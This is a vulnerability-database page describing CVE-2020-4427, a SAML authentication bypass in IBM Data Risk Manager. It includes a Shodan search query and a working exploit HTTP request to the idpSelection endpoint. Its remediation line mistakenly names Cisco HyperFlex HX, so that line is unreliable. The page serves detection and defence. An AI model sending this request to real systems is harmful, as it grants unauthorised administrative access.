🔙 목록으로 돌아가기

CVE-2020-4427: IBM Data Risk Manager - Authentication Bypass via SAML

TitleIBM Data Risk Manager - Authentication Bypass via SAML
Authorritikchaddha
SeverityCritical
ImpactUnauthenticated attackers can bypass authentication via SAML endpoint and gain full administrative access to IBM Data Risk Manager, compromising all managed data risk information.
RemediationApply the latest security updates and patches provided by Cisco for HyperFlex HX.
CVSS Score9.8
EPSS Score0.90345
CVE IDCVE-2020-4427
CWE IDCWE-287
Shodan Querytitle:"IBM Data Risk Manager"
Tags cve cve2020 ibm saml auth-bypass kev vkev vuln

🔍 Vulnerability Description

IBM Data Risk Manager versions 2.0.1 through 2.0.6 are vulnerable to authentication bypass when configured with SAML authentication. A remote attacker can bypass security restrictions by sending a specially crafted HTTP request to the SAML idpSelection endpoint, allowing them to bypass the authentication process and gain full administrative access to the system.

🌐 HTTP Request

GET /albatross/saml/idpSelection?id=38FUN9J7h1y14GCmDW6Z5TtYh0f&userName=admin HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-4427.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-4427.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A